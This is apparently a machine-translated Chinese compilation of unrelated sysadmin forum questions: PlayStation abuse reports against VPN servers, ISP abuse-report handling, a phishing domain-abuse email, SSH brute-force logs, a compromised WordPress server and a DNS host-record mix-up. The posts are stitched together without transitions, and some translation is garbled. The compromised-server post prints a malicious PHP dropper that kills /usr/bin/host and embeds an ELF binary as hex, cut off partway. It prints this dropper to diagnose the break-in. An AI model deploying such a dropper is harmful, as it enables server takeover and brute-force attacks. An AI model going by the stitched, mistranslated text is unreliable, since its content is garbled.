伙计们,我有多台安装了 OpenVPN 的服务器,由于来自 PlayStation 网络的滥用报告,它们都被左右暂停。现在,我假设我的 VPN 客户端正在尝试破解 PlayStation 帐户,对吗?我要做的是阻止所有 PlayStation URL 的 VPN 流量。问题是没有特定的 IP 可以阻止!他们使用 GeoDNS,它根据用户的位置提供来自不同 IP 的数据。我可以在这里做什么?是否有要阻止的 PlayStation IP 的完整列表?或者我可以阻止对这些 URL 的访问吗?
auth.api.sonyentertainmentnetwork.com
native-ps3.np.ac.playstation.net
account.sonyentertainmentnetwork.com
auth.np.ac.playstation.net
accounts.api.playstation.com
native.np.ac.playstation.net
我正在建立一家小型企业,将为利基市场提供互联网服务。我们将提供完全不受限制和不受监控的(在法律允许的范围内 - 虽然我们不希望这样做,但如果有正当理由,我们仍然能够捕获数据包)互联网访问,我不确定我们应该如何应对滥用报告(Google 搜索未找到任何相关内容)。
假设我收到一封来自我们客户的一个 IP 的关于 SSH 暴力破解的电子邮件。我如何判断它是否是真实的而不是巨魔(日志条目甚至 .pcaps 都可以伪造)?大型 ISP 是如何做到的(对于那些真正关心滥用报告的人,我的意思是)?
同样,关于垃圾邮件的投诉,我如何在采取行动之前检查它们是否真实?这甚至是一个问题吗?在某些情况下,巨魔会报告某人涉嫌做坏事,希望让他们与他们的提供者有麻烦?
我是否注定要记录离开我的网络的每一个数据包,还是有一个不会走极端的行业标准解决方案?
问候。
我收到了来自 的域滥用通知电子邮件[email protected]。
该邮件要求下载我认为包含病毒的 Word 文档。
亲爱的域名所有者,
我们的系统检测到您的域:example.com 最近被用于发送垃圾邮件和传播恶意软件。
您可以下载您的域的详细滥用报告以及事件的日期/时间。点击这里
我们还提供了有关如何将您的域从黑名单中删除的详细说明。
请立即下载报告并在 24 小时内采取适当措施,否则您的域名将被永久暂停。
也有可能采取法律行动取决于您滥用案件的严重程度和持久性。
三个简单的步骤:
- 下载您的滥用报告。
- 检查您的域滥用事件以及日期和时间。
- 采取几个简单的步骤进行预防并避免域暂停。
单击此处下载您的报告
请查看并与我们联系。
我想知道我是否错过了在 ISP 方面启用/配置某些内容,或者我是否在我的域中留下了一些电子邮件地址,因为这些垃圾邮件发送者也将我作为目标。
有没有办法保护/配置我的域以避免这些电子邮件?
上周我收到了很多来自我有服务器的公司的电子邮件。有人可以帮我解决这个“滥用”问题吗?使用 Linux Debian 8
我们检测到来自 IP 地址 XX.XX.XXX.XX 的滥用行为,根据 whois 查询,该地址在您的网络上。如果您能酌情进行调查并采取行动,我们将不胜感激。
下面给出了日志行,但请询问您是否需要任何进一步的信息。
(如果您不是正确的联系人,请接受我们的道歉 - 您的电子邮件地址是通过自动过程从 whois 记录中提取的。此邮件由 Fail2Ban 生成。)
注意:本地时区为 +0100 (CET) Dec 16 07:06:34 jazzmessengers sshd[27500]: Connection closed by XX.XX.XXX.XX
12 月 16 日 07:06:39 jazzmessengers sshd [27581]:来自 XX.XX.XXX.XX 端口 35074 ssh2 的 root 密码失败
12 月 16 日 07:06:41 jazzmessengers sshd [27581]:来自 XX.XX.XXX.XX 端口 35074 ssh2 的 root 密码失败
12 月 16 日 07:06:43 jazzmessengers sshd [27581]:来自 XX.XX.XXX.XX 端口 35074 ssh2 的 root 密码失败
12 月 16 日 07:06:43 jazzmessengers sshd [27583]:连接由 XX.XX.XXX.XX 关闭
12 月 16 日 09:14:58 jazzmessengers sshd[10829]:来自 XX.XX.XXX.XX 的用户测试无效
12 月 16 日 09:15:00 jazzmessengers sshd[10850]:来自 XX.XX.XXX.XX 的用户测试无效
12 月 16 日 09:15:01 jazzmessengers sshd [10829]:来自 XX.XX.XXX.XX 端口 40769 ssh2 的无效用户测试的密码失败
12 月 16 日 09:15:02 jazzmessengers sshd [10829]:来自 XX.XX.XXX.XX 端口 40769 ssh2 的无效用户测试的密码失败
12 月 16 日 09:15:02 jazzmessengers sshd[10831]:连接由 XX.XX.XXX.XX 关闭
12 月 16 日 09:15:02 jazzmessengers sshd [10850]:来自 XX.XX.XXX.XX 端口 44143 ssh2 的无效用户测试的密码失败
12 月 16 日 09:15:04 jazzmessengers sshd [10850]:来自 XX.XX.XXX.XX 端口 44143 ssh2 的无效用户测试的密码失败
12 月 16 日 11:17:35 jazzmessengers sshd [28958]:来自 XX.XX.XXX.XX 的用户 samba 无效
12 月 16 日 11:17:38 jazzmessengers sshd [28958]:来自 XX.XX.XXX.XX 端口 57529 ssh2 的无效用户 samba 的密码失败
(我删除了一部分,因为 Stackoverflow 认为它是垃圾邮件..)
12 月 16 日 17:11:40 jazzmessengers sshd [28478]:来自 XX.XX.XXX.XX 端口 46737 ssh2 的无效用户商业密码失败
12 月 16 日 17:11:40 jazzmessengers sshd [28480]:连接由 XX.XX.XXX.XX 关闭
12 月 16 日 17:11:40 jazzmessengers sshd [28489]:来自 XX.XX.XXX.XX 的无效用户商业广告
我是一堆虚拟化 Web 服务器的初学者系统管理员。最近我们收到一封电子邮件,称我们的一个服务器正被用于“蛮力”攻击。电子邮件的内容类似于以下内容。
问候,
/somehost/ 滥用团队想通知您,我们已经从您的网络,从 IP 地址 /my 对我们的共享主机服务器 /somehost/.ru /ip-number/ 上的 Joomla/WordPress 控制面板进行了大规模暴力尝试-IP地址/
在过去的 30 分钟内,我们记录了 1500 次这样的尝试:
/my-ip-address/ /their-domain/ - [12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"
/my-ip-address/ /their-domain/ - [12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"
/my-ip-address/ /their-domain/ - [12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"
/my-ip-address/ /their-domain/ - [12/Jan/2014:13:29:06 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"
/my-ip-address/ /their-domain/ - [12/Jan/2014:13:29:06 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"
先前在此服务器上记录的此尝试总数 (/some-host/.ru)[/their-ip/]:
====
此消息由 /some-company-name/ 安全系统自动发送。您从公共 WhoIs 服务获得的电子邮件地址。如果您误收到此消息,我们深表歉意。如果您的电子邮件与此 IP 地址或网络无关,请联系我们。
====
谢谢你,/somehost/ 滥用团队
http:// /somehost/ 点 ru
/俄罗斯的一些电话号码/,
/俄罗斯的更多联系方式/
当在他们的日志中可以明显看出“wp-login.php”是来自 WordPress 的 PHP 脚本时,我觉得他们写“Joomla/Wordpress”很奇怪。
在我们的服务器上,我们通过 Webmin/Virtualmin 和一个无法从外部访问的 Squid 服务器托管多个 WordPress 博客。
我观察了一段时间的交通,iftop看nethogs不到任何可疑的东西。鱿鱼访问日志对我来说似乎很正常。
我们可以在“安全”日志中看到许多尝试登录我们的服务器的尝试,但没有人管理它以获得访问权限。
请参阅安全的以下转储。
an 12 02:35:19 /server/ saslauthd[2186]: pam_unix(smtp:auth): check pass; user unknown
Jan 12 02:35:19 /server/ saslauthd[2186]: pam_unix(smtp:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=
Jan 12 02:35:19 /server/ saslauthd[2186]: pam_succeed_if(smtp:auth): error retrieving information about user thomas
还有一个。
Jan 12 03:00:29 /server/ sshd[21948]: Invalid user anton from 109.7.72.130
Jan 12 03:00:29 /server/ sshd[21949]: input_userauth_request: invalid user anton
Jan 12 03:00:29 /server/ sshd[21948]: pam_unix(sshd:auth): check pass; user unknown
Jan 12 03:00:29 /server/ sshd[21948]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=130.72.7.109.rev.sfr.net
Jan 12 03:00:29 /server/ sshd[21948]: pam_succeed_if(sshd:auth): error retrieving information about user anton
Jan 12 03:00:32 /server/ sshd[21948]: Failed password for invalid user anton from 109.7.72.130 port 40925 ssh2
Jan 12 03:00:32 /server/ sshd[21949]: Received disconnect from 109.7.72.130: 11: Bye Bye
通过“谁”,我可以清楚地看到只有我通过 SSH 登录。
今天我将所有 Webmin 和 Virtualmin 模块以及 Squid 更新到最新版本。
编辑:
到目前为止我所做的:
find / -type f -name "*"
-newermt 2014-01-12 ! -newermt 2014-01-12 > out.log. 没有改变。我不想按照如何处理受损服务器中的建议断开服务器与 Internet 的连接?. 我们的数据已备份,因此我们目前是安全的。但是,我想找出导致攻击的原因,但我仍然无法实现。
编辑 15.01.2014:
我nethogs能够发现/usr/bin/host接收和发送的数据比预期的要多得多。
NetHogs version 0.8.0
PID USER PROGRAM DEV SENT RECEIVED
10267 /domain//usr/bin/host eth0 120.571 791.124 KB/sec
30517 /domain/sshd: /domain/@pts/0 eth0 2.177 0.111 KB/sec
? root /ip-address/:39586-119.247.224.98:80 0.000 0.000 KB/sec
? root /ip-address/:55718-69.163.148.232:80 0.000 0.000 KB/sec
? root /ip-address/:38474-184.154.230.15:80 0.000 0.000 KB/sec
? root /ip-address/:46593-66.7.212.199:80 0.000 0.000 KB/sec
? root /ip-address/:58733-202.232.144.194:80 0.000 0.000 KB/sec
? root /ip-address/:41154-83.170.122.1:80 0.000 0.000 KB/sec
? root /ip-address/:39996-98.129.229.146:80 0.000 0.000 KB/sec
? root /ip-address/:39872-98.129.229.146:80 0.000 0.000 KB/sec
? root /ip-address/:37429-144.76.15.247:80 0.000 0.000 KB/sec
? root /ip-address/:35063-216.12.197.226:80 0.000 0.000 KB/sec
? root /ip-address/:51335-153.120.33.64:80 0.000 0.000 KB/sec
? root /ip-address/:58344-64.207.178.120:80 0.000 0.000 KB/sec
? root /ip-address/:55848-69.163.148.232:80 0.000 0.000 KB/sec
? root /ip-address/:46799-66.7.212.199:80 0.000 0.000 KB/sec
? root /ip-address/:38110-66.155.9.238:80 0.000 0.000 KB/sec
? root /ip-address/:39713-76.74.254.120:80 0.000 0.000 KB/sec
? root /ip-address/:33814-209.217.227.30:80 0.000 0.000 KB/sec
? root /ip-address/:41009-212.113.141.212:80 0.000 0.000 KB/sec
? root /ip-address/:57027-173.11.110.117:80 0.000 0.000 KB/sec
? root /ip-address/:45436-83.222.250.186:80 0.000 0.000 KB/sec
? root /ip-address/:59143-202.232.144.194:80 0.000 0.000 KB/sec
? root /ip-address/:43357-217.9.42.182:80 0.000 0.000 KB/sec
? root /ip-address/:32981-82.113.145.170:80 0.000 0.000 KB/sec
? root unknown TCP 0.000 0.000 KB/sec
TOTAL 122.749 791.235 KB/sec
在 PID 上运行lsof时,您可以清楚地看到 WordPress 安装确实有问题。
[root@/domain/ logs]# lsof | grep 1706
host 1706 /domain/ cwd DIR 253,0 4096 10178 /home//domain//public_html/wp-content/themes/twentyeleven
host 1706 /domain/ rtd DIR 253,0 4096 2 /
host 1706 /domain/ txt REG 253,0 137592 1054438 /usr/bin/host
host 1706 /domain/ mem REG 253,0 156928 1178048 /lib64/ld-2.12.so
host 1706 /domain/ mem REG 253,0 22536 1178065 /lib64/libdl-2.12.so
host 1706 /domain/ mem REG 253,0 1926800 1178057 /lib64/libc-2.12.so
host 1706 /domain/ mem REG 253,0 145896 1178061 /lib64/libpthread-2.12.so
host 1706 /domain/ mem REG 253,0 91096 1178098 /lib64/libz.so.1.2.3
host 1706 /domain/ mem REG 253,0 358560 1051774 /usr/lib64/libisc.so.83.0.3
host 1706 /domain/ mem REG 253,0 599384 1178963 /lib64/libm-2.12.so
host 1706 /domain/ mem REG 253,0 124624 1178074 /lib64/libselinux.so.1
host 1706 /domain/ mem REG 253,0 113952 1178072 /lib64/libresolv-2.12.so
host 1706 /domain/ mem REG 253,0 1674840 1050692 /usr/lib64/libdns.so.81.4.1
host 1706 /domain/ mem REG 253,0 140568 1051828 /usr/lib64/libisccfg.so.82.0.1
host 1706 /domain/ mem REG 253,0 34696 1051827 /usr/lib64/libisccc.so.80.0.0
host 1706 /domain/ mem REG 253,0 17256 1178085 /lib64/libcom_err.so.2.1
host 1706 /domain/ mem REG 253,0 1953536 1050724 /usr/lib64/libcrypto.so.1.0.1e
host 1706 /domain/ mem REG 253,0 12592 1178067 /lib64/libkeyutils.so.1.3
host 1706 /domain/ mem REG 253,0 46368 1178081 /lib64/libkrb5support.so.0.1
host 1706 /domain/ mem REG 253,0 19016 1178989 /lib64/libcap.so.2.16
host 1706 /domain/ mem REG 253,0 944712 1178089 /lib64/libkrb5.so.3.3
host 1706 /domain/ mem REG 253,0 177520 1178083 /lib64/libk5crypto.so.3.1
host 1706 /domain/ mem REG 253,0 209120 1180550 /lib64/libidn.so.11.6.1
host 1706 /domain/ mem REG 253,0 280520 1178096 /lib64/libgssapi_krb5.so.2.2
host 1706 /domain/ mem REG 253,0 52944 1051829 /usr/lib64/libbind9.so.80.0.4
host 1706 /domain/ mem REG 253,0 75936 1052874 /usr/lib64/liblwres.so.80.0.2
host 1706 /domain/ mem REG 253,0 21152 1178987 /lib64/libattr.so.1.1.0
host 1706 /domain/ mem REG 253,0 1383368 1051772 /usr/lib64/libxml2.so.2.7.6
host 1706 /domain/ DEL REG 253,0 656 /home//domain//public_html/wp-content/themes/twentyeleven/bruteforce.so
host 1706 /domain/ mem REG 253,0 27424 1178071 /lib64/libnss_dns-2.12.so
host 1706 /domain/ mem REG 253,0 65928 1178073 /lib64/libnss_files-2.12.so
host 1706 /domain/ mem REG 253,0 12582912 11739 /home//domain//public_html/wp-content/themes/twentyeleven/.sd0
host 1706 /domain/ DEL REG 253,0 655 /home//domain//public_html/wp-content/themes/twentyeleven/libworker.so
host 1706 /domain/ 0r CHR 1,3 0t0 3782 /dev/null
host 1706 /domain/ 1r CHR 1,3 0t0 3782 /dev/null
host 1706 /domain/ 2r CHR 1,3 0t0 3782 /dev/null
host 1706 /domain/ 3r CHR 1,3 0t0 3782 /dev/null
spamd 18546 root mem REG 253,0 37000 1317060 /usr/lib64/perl5/auto/List/Util/Util.so
spamd 18548 root mem REG 253,0 37000 1317060 /usr/lib64/perl5/auto/List/Util/Util.so
spamd 18549 root mem REG 253,0 37000 1317060 /usr/lib64/perl5/auto/List/Util/Util.so
我得看看home//domain//public_html/wp-content/themes/twentyeleven/bruteforce.so。
简单地说,所有在 2014 年 1 月更改的文件都不在 WordPress 的标准 21 主题安装中。例如,有一个名为的脚本initvsafe.php可用于在文件系统中存储文件。
<?php
header("Content-type: text/plain");
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\x48\x69\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x0f\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\xf0\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xf0\x60\x00\x00\xf0\x70\x00\x00\xf0\x70\x00\x00\xf0\x07\x00\x00\xac\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\xf0\x60\x00\x00\xf0\x70\x00\x00\xf0\x70\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x25\x00\x00\x00\x3c\x00\x00\x00\x21\x00\x00\x00\x31\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x00\x00\x11\x00\x00\x00\x1c\x00\x00\x00\x28\x00\x00\x00\x2f\x00\x00\x00\x3b\x00\x00\x00\x29\x00\x00\x00\x39\x00\x00\x00\x15\x00\x00\x00\x05\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x38\x00\x00\x00\x33\x00\x00\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x32\x00\x00\x00\x1e\x00\x00\x00\x3a\x00\x00\x00\x2a\x00\x00\x00\x34\x00\x00\x00\x36\x00\x00\x00\x23\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
...
昨天,我注意到一个客户(他对网络的了解刚好够危险)弄乱了他的一个域名服务器记录。我们最近搬迁到不同的托管服务提供商,ns2.his-domain.com 指向最近空出的机柜中的网络。我指示他,“去您的注册商处,更改此名称服务器指向的 IP,因为在此之前,您的所有客户的域只有一个有效的名称服务器”。
由于时区差异——他住在欧洲,我在美国——我们无法现场交谈。
今天早上,我发现他用霰弹枪解决了这个问题。他不仅将 ns2.his-domain.com 更改为指向正确的 IP,然后他还继续为他曾经使用过的每个主机名创建更多的主机记录 - 在注册商级别,使用他们的 Web 工具创建名称服务器过去用过的,还有一些他觉得以后可能会用到的,都指向同一个IP。
ns3.his-domain.com、ns4.his-domain.com、www.his-domain.com、ftp.his-domain.com、kirk.his-domain.com、spock.his-domain.com、scotty。 his-domain.com 等 - 现在可以使用 Whois 查找所有这些,绕过我们的本地名称服务器,使根名称空间变得混乱。他在域注册表中创建了大约 20 个主机记录,所有这些记录都指向完全相同的 IP。
我的直觉是,这非常非常糟糕。它破坏了 DNS 的基本设计,它应该是分层的!
这有什么后果?标准中是否有任何东西——在 RFC 或其他地方——禁止这样做,并描述了可能发生的结果?
示例(更改名称以保护有罪者:)
$ whois spock.his-domain.com
Whois Server Version 2.0
Server Name: SPOCK.HIS-DOMAIN.COM
IP Address: 22.33.44.55
Registrar: COMPUTER SERVICES LANGENBACH GMBH DBA JOKER.COM
Whois Server: whois.joker.com
Referral URL: http://www.joker.com
